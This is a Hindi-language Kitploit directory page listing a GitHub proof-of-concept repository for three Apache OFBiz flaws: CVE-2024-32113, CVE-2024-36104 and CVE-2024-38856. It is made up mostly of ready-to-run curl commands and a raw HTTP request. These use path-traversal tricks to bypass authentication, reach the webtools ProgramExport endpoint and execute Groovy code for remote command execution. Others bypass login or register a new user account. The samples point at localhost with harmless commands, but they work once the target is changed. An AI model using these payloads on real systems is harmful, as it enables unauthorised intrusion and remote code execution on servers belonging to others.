Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-32113-POC — Apache OfBiz भेद्यताएँ | Kitploit
उपकरण/GitHubGitHub/racerz-fighting/cve-2024-32113-poc
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरण
GitHubracerz-fighting/cve-2024-32113-poc

CVE-2024-32113-POC

Apache OfBiz भेद्यताएँ

रिपॉजिटरी देखें
822 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Apache OfBiz कमजोरियाँ

CVE-2024-32113 के लिए POC

USERNAME और PASSWORD पैरामीटर /ecomseo/AnonContactus इंटरफ़ेस पर प्रदान किए जा सकते हैं, जो किसी के लिए भी सार्वजनिक रूप से सुलभ है।

  • POC1:RCE

    root@kitploit:~
    curl --noproxy '*' -k --location --request POST 'https://127.0.0.1:8443/xxx/yyy/zzz/../../../%2e/webtools/control/ProgramExport' \
    --header 'User-Agent: Apifox/1.0.0 (https://apifox.com)' \
    --header 'Accept: */*' \
    --header 'Host: 127.0.0.1:8443' \
    --header 'Connection: keep-alive' \
    --header 'Content-Type: application/x-www-form-urlencoded' \
    --data-urlencode '[email protected]' \
    --data-urlencode 'JavaScriptEnabled=Y' \
    --data-urlencode 'PASSWORD=12345' \
    --data-urlencode 'groovyProgram=println (('\''tou'\'' + '\''ch /tmp/success'\'').execute().text);'
    
  • POC2:आप प्रतिबंधित webtools प्रबंधन इंटरफ़ेस तक पहुँचने के लिए लॉगिन को बायपास कर सकते हैं।

    root@kitploit:~
    curl --noproxy '*' -k --location --request POST 'https://127.0.0.1:8443/xxx/yyy/zzz/../../../%2e/webtools/control/login/' \
    --header 'User-Agent: Apifox/1.0.0 (https://apifox.com)' \
    --header 'Accept: */*' \
    --header 'Host: 127.0.0.1:8443' \
    --header 'Connection: keep-alive' \
    --header 'Content-Type: application/x-www-form-urlencoded' \
    --data-urlencode '[email protected]' \
    --data-urlencode 'PASSWORD=12345' \
    --data-urlencode 'JavaScriptEnabled=Y'
    
  • POC3:आप एक सामान्य उपयोगकर्ता खाता पंजीकृत कर सकते हैं, जहाँ userLoginId उपयोगकर्ता नाम के रूप में होता है।

    root@kitploit:~
    curl --noproxy '*'  -k --location --request POST 'https://127.0.0.1:8443/xxx/yyy/zzz/../../../%2e/webtools/control/createUserLogin' \
    --header 'User-Agent: Apifox/1.0.0 (https://apifox.com)' \
    --header 'Accept: */*' \
    --header 'Host: 127.0.0.1:8443' \
    --header 'Connection: keep-alive' \
    --header 'Content-Type: application/x-www-form-urlencoded' \
    --data-urlencode '[email protected]' \
    --data-urlencode 'PASSWORD=12345' \
    --data-urlencode 'JavaScriptEnabled=Y' \
    --data-urlencode 'enabled=Y' \
    --data-urlencode 'partyId=' \
    --data-urlencode 'userLoginId=30000' \
    --data-urlencode 'currentPassword=12345' \
    --data-urlencode 'currentPasswordVerify=12345' \
    --data-urlencode 'passwordHint=' \
    --data-urlencode 'requirePasswordChange=N' \
    --data-urlencode 'securityQuestion=' \
    --data-urlencode 'SecurityAnswer=' \
    --data-urlencode 'externalAuthId='
    

CVE-2024-36104 के लिए POC

  • RCE1

    root@kitploit:~
    curl --noproxy '*' -k --location --request POST 'https://127.0.0.1:8443/xxx/yyy/zzz/.%2e/.%2e/.%2e/webtools/control/ProgramExport' \
    --header 'User-Agent: Apifox/1.0.0 (https://apifox.com)' \
    --header 'Accept: */*' \
    --header 'Host: 127.0.0.1:8443' \
    --header 'Connection: keep-alive' \
    --header 'Content-Type: application/x-www-form-urlencoded' \
    --data-urlencode '[email protected]' \
    --data-urlencode 'JavaScriptEnabled=Y' \
    --data-urlencode 'PASSWORD=12345' \
    --data-urlencode 'groovyProgram=println (('\''tou'\'' + '\''ch /tmp/success'\'').execute().text);'
    
  • RCE2

    root@kitploit:~
    curl --noproxy '*' -k --location --request POST 'https://127.0.0.1:8443/xxx/yyy/zzz/..;/..;/..;/webtools/control/ProgramExport' \
    --header 'User-Agent: Apifox/1.0.0 (https://apifox.com)' \
    --header 'Accept: */*' \
    --header 'Host: 127.0.0.1:8443' \
    --header 'Connection: keep-alive' \
    --header 'Content-Type: application/x-www-form-urlencoded' \
    --data-urlencode '[email protected]' \
    --data-urlencode 'JavaScriptEnabled=Y' \
    --data-urlencode 'PASSWORD=12345' \
    --data-urlencode 'groovyProgram=println (('\''tou'\'' + '\''ch /tmp/success'\'').execute().text);'
    

    PS: ; कुकी सेटिंग में exception उत्पन्न करेगा, आपको कुकी मैन्युअल रूप से प्राप्त करनी होगी।

    image-20240514104449523

image-20240514104433195

CVE-2024-38856 के लिए POC

  • RCE

    root@kitploit:~
    POST /webtools/control/forgotPassword/ProgramExport HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 127.0.0.1:8443
    
    groovyProgram=throw+new+Exception('id'.execute().text);
    

    PS:forgotPassword को अन्य अनुरोधों से बदला जा सकता है। आप fuzzing करने के लिए webapp/webtools/WEB-INF/controller.xml में इसे खोजने का प्रयास कर सकते हैं (जैसा कि चित्र में दिखाया गया है)। जब तक अनुरोध सफलतापूर्वक success लौटाता है, यह ProgramExport मॉड्यूल में RCE ट्रिगर कर सकता है।

    image-20240604195154504

टूल डाउनलोड करें